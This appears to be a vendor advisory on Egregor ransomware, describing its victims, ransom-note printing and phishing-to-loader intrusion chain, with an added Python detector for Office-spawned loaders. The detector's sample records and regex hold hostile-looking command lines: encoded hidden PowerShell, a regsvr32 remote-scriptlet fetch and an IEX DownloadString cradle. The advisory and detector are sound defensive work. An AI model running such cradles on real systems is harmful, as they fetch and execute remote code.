As part of our effort to inform our clients about potential and serious cybersecurity issues, MCP provides advisories about vulnerabilities and exploits that could threaten the operations of their critical communications networks. Sign up to receive these advisories in your inbox as soon as they are released.
This week, there is a new critical alert that requires the mission-critical community’s immediate attention.
Advisory Overview
The ransomware-as-a-service (RaaS) family “Egregor” has surged across the IT landscape since the shutdown of the notorious Maze ransomware operation. Several major organizations have already fallen victim, including Kmart, Cencosud (a South American retail giant), Randstad NV (the world’s largest staffing company and owner of Monster.com), and TransLink (Vancouver’s bus and rail transit authority).
Egregor has been observed hijacking network-attached printers and repeatedly printing its ransom note; at retail victims, the note has printed on customers’ receipts at checkout. Mission Critical Partners recommends deploying advanced endpoint protection capable of blocking ransomware before it executes.
Technical Detail and Additional Information
What is the threat?
Egregor first appeared in September 2020 and has since taken large public-sector and private-sector organizations hostage. Within the last month it has infected numerous companies, encrypting systems and demanding payment both to decrypt files and to withhold publication of the data it exfiltrated. Multiple sources have confirmed that many affiliates moved to Egregor as their malware of choice after the Maze operation shut down, and attacks have been rising steadily.
Why is this noteworthy?
Since its first sighting in September 2020, Egregor has been confirmed to have successfully compromised several well-known entities. Beyond the surge in infections, Egregor is somewhat more aggressive than most ransomware: in addition to stealing files, encrypting systems, and extorting the victim, it “print bombs” the ransom note through every attached printer it can reach, making the breach visible to staff and customers and adding pressure on the victim.
What is the exposure?
An agency’s exposure to a ransomware attack varies greatly with many factors; however, the overwhelming majority of ransomware attacks begin with a phishing email carrying a malicious payload, typically a Word or Excel attachment or a lure posing as a Google Docs or DocuSign document. Continuously training employees to recognize and report suspicious messages is key to protecting the organization, and should be paired with technical controls such as blocking macros in documents that arrive from the internet. Once the malicious attachment is opened, a commodity loader such as Qbot (QakBot), Ursnif, or IcedID is downloaded, followed by Cobalt Strike, a commercial adversary-emulation framework that attackers widely abuse for reconnaissance and lateral movement. With Cobalt Strike deployed, the threat actor can pivot from a single workstation to broad access across the network in very little time, so detecting the initial macro-to-loader hand-off on the endpoint is the best opportunity to stop the intrusion early.
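The hand-off described above (a phishing document launching a script host or living-off-the-land binary that fetches the loader) leaves a distinctive parent/child process pattern on the endpoint. The following is an added example, written for this page and not code from Mission Critical Partners or from any vendor product, that scans process-creation records for that pattern. It assumes a simplified, tab-separated record layout modelled on Sysmon Event ID 1 fields (Computer, User, ParentImage, Image, CommandLine); the sample records, host names, users, and IP addresses are constructed for the demonstration and are not real telemetry.

```python
"""Flag Office-spawned loaders in process-creation telemetry.

Added example for this advisory (not MCP or vendor code). The record format
is an assumption: one tab-separated line per process-creation event with the
fields Computer, User, ParentImage, Image, CommandLine, modelled loosely on
Sysmon Event ID 1. Replace parse_event() for your own SIEM export.
"""
import re
from dataclasses import dataclass
from typing import Iterable

# Office applications that a phishing lure is opened with (lower-cased image names).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script hosts and living-off-the-land binaries a macro dropper commonly
# launches to fetch the next stage (QakBot, IcedID, Ursnif, ...).
LOADER_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Command-line indicators of a download cradle or an encoded PowerShell payload.
CRADLE_RE = re.compile(
    r"(?:-e(?:nc|ncodedcommand)\b|downloadstring|downloadfile|invoke-webrequest|"
    r"-urlcache|/i:https?://|https?://)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcessEvent:
    computer: str
    user: str
    parent_image: str
    image: str
    command_line: str


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse one tab-separated record (assumed layout, see module docstring)."""
    fields = line.rstrip("\n").split("\t", 4)
    if len(fields) != 5:
        raise ValueError(f"expected 5 tab-separated fields, got {len(fields)}: {line!r}")
    return ProcessEvent(*fields)


def classify(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like a macro-to-loader hand-off (empty if benign)."""
    parent, child = image_name(ev.parent_image), image_name(ev.image)
    reasons = []
    if parent in OFFICE_PARENTS and child in LOADER_CHILDREN:
        reasons.append(f"{parent} spawned {child}")
    if CRADLE_RE.search(ev.command_line):
        reasons.append("download cradle or encoded command in command line")
    return reasons


def find_suspicious(lines: Iterable[str]) -> list[tuple[str, str, list[str]]]:
    """Return (computer, child image name, reasons) for every flagged record."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = classify(ev)
        if reasons:
            hits.append((ev.computer, image_name(ev.image), reasons))
    return hits


# Constructed sample records (not real telemetry); IPs are from documentation ranges.
SAMPLE_EVENTS = [
    # Benign: Word hands a print job to the printer-driver helper.
    "WS01\tCORP\\jdoe\tC:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "\tC:\\Windows\\splwow64.exe\tC:\\Windows\\splwow64.exe 12288",
    # Macro dropper: Word launches cmd, which launches hidden, encoded PowerShell.
    "WS01\tCORP\\jdoe\tC:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c powershell.exe -nop -w hidden -enc BASE64PAYLOAD",
    # Excel macro abusing regsvr32 to fetch a remote scriptlet.
    "WS03\tCORP\\svc-fin\tC:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "\tC:\\Windows\\System32\\regsvr32.exe\tregsvr32.exe /s /n /u /i:http://198.51.100.7/update.sct scrobj.dll",
    # Download cradle under a non-Office parent: still worth a look, lower confidence.
    "WS02\tCORP\\asmith\tC:\\Windows\\explorer.exe"
    "\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')",
    # Benign admin activity: Explorer opens an interactive command prompt.
    "WS02\tCORP\\asmith\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\cmd.exe"
    "\t\"C:\\Windows\\System32\\cmd.exe\"",
]

if __name__ == "__main__":
    for computer, child, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{computer}: {child} -> {'; '.join(reasons)}")
```

The two rules are deliberately independent: an Office application spawning a script host is suspicious on its own (the first sample shows the benign `splwow64.exe` print helper is not flagged), while a download cradle is flagged regardless of parent so that a loader that has already escaped the Office process tree is still surfaced. In production, the encoded-command match should be followed by decoding the payload, and both rules should be tuned against a baseline of the organisation’s own Office child processes before alerting.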
What are the recommendations?
The current recommendations to mitigate the impact of a potential ransomware attack are as follows:
For more in-depth information about the recommendations, please visit the following links:
Mike Beagles has specialized experience with supporting mission critical communications agencies by providing technical expertise, strategic IT planning, and architecting both on-prem and shared systems for new and innovative technologies as well as legacy solutions. He currently manages the platform and suite of tools used to deliver MCP network and cybersecurity monitoring to our clientele.